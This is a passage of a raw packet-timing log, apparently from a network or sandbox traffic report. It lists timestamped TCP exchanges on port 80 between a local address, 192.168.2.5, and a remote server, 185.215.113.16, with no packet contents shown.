                                                                                                                                                                          Nov 23, 2024 19:01:39.689579010 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.689594030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.689645052 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.690419912 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.690495014 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.690510988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.690565109 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.691262007 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.691349983 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.691365004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.691411018 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.692171097 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.692215919 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.692230940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.692286015 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.692903042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.692986012 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.693000078 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.693054914 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.693768978 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.693816900 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.693830967 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.693881989 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.694622993 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.694680929 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.694696903 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.694749117 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.695477009 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.695528030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.695542097 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.695590973 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.696363926 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.696388960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.696403980 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.696465969 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.697173119 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.697208881 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.697242022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.697293997 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.698075056 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.698091030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.698107004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.698156118 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.698878050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.698935032 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.698951006 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.698997021 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.699759960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.699816942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.699831963 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.699862957 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.699883938 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.700668097 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.700702906 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.700716972 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.700754881 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.701445103 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.701740026 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.701766968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.701781034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.701812983 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.702584982 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.702655077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.702676058 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.702727079 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.703458071 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.703516006 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.703531981 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.703571081 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.704304934 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.704356909 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.704370975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.704426050 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.705177069 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.705229044 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.705244064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.705297947 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.706032991 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.706104040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.706123114 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.706171036 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.706882954 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.706948042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.706962109 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.707019091 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.707745075 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.707789898 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.707804918 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.707854033 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.708543062 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.708589077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.708604097 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.708652020 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.709397078 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.709450960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.709466934 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.709515095 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.710269928 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.710285902 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.710300922 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.710349083 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.711112022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.711132050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.711148024 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.711191893 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.711967945 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.711987019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.712001085 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.712049961 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.712824106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.712888956 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.712903976 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.712907076 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.712939024 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.713799000 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.713861942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.713876963 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.713905096 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.714656115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.714720011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.714735031 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.714782953 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.715363979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.715404034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.715420008 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.715466022 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.716249943 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.716519117 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.716562033 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.716577053 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.716609001 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.717364073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.717458010 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.717473030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.717524052 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.718228102 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.718281984 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.718297958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.718346119 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.719098091 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.719155073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.719172955 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.719223976 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.719959974 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.720014095 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.720030069 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.720077038 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.720772982 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.720833063 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.720848083 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.720896006 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.721637011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.721688986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.721704006 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.721750021 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.722485065 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.722537041 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.722553968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.722601891 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.723475933 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.723490000 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.723505974 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.723552942 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.724214077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.724251986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.724266052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.724312067 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.725033045 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.725085974 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.725101948 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.725135088 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.725908041 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.725975990 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.725990057 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.726037979 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.726759911 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.726813078 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.726834059 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.726891041 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.727627993 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.727688074 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.727701902 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.727751017 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.728446960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.728492022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.728507042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.728555918 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.729377985 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.729434013 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.729449034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.729496956 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.730184078 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.730247021 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.730262041 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.730309963 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.731093884 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.731353998 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.731379986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.731393099 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.731427908 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.732148886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.732209921 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.732224941 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.732281923 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.733031988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.733089924 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.733104944 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.733155012 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.733875990 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.733982086 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.733997107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.734046936 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.734711885 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.734729052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.734744072 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.734777927 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.735553980 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.735599995 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.735614061 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.735661983 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.736428022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.736473083 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.736486912 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.736526966 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.737274885 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.737298012 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.737313986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.737364054 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.738156080 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.738202095 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.738215923 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.738265038 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.739085913 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.739124060 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.739140987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.739191055 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.739955902 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.740024090 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.740037918 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.740086079 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.740725040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.740742922 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.740912914 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.740942001 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.741552114 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.741611958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.741627932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.741655111 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.742496014 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.742558956 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.742626905 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.742674112 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.743290901 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.743304968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.743333101 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.743380070 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.744221926 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.744237900 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.744252920 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.744301081 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.744962931 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.745035887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.745050907 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.745080948 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.745811939 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.746097088 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.746120930 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.746133089 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.746157885 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.746268034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.747067928 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.747081041 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.747104883 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.792996883 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.860575914 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.860706091 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.860729933 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.860771894 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.860871077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.860888004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.860930920 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.861542940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.861603975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.861618042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.861650944 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.861665964 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.862271070 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.862303019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.862317085 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.862351894 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.863111973 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.863204002 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.863218069 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.863254070 CET4973880192.168.2.5185.215.113.16
